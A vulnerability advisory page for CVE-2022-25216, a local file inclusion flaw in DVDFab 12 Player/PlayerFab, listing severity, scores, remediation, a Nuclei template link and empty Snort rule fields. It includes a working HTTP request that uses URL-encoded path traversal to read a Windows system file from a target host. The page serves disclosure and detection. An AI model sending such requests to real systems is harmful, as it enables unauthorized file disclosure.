🔙 목록으로 돌아가기

CVE-2022-25216: DVDFab 12 Player/PlayerFab - Local File Inclusion

TitleDVDFab 12 Player/PlayerFab - Local File Inclusion
Author0x_Akoko
SeverityHigh
ImpactThe vulnerability allows an attacker to include arbitrary local files, potentially leading to unauthorized access, information disclosure.
RemediationApply the latest patch or update from the vendor to fix the vulnerability.
CVSS Score7.5
EPSS Score0.82777
CVE IDCVE-2022-25216
CWE IDCWE-22
Tags cve cve2022 dvdFab lfi lfr tenable dvdfab vuln

🔍 Vulnerability Description

DVDFab 12 Player/PlayerFab is susceptible to local file inclusion which allows a remote attacker to download any file on the Windows file system for which the user account running DVDFab 12 Player (recently renamed PlayerFab) has read-access.

🌐 HTTP Request

GET /download/C%3a%2fwindows%2fsystem.ini HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-25216.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-25216.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A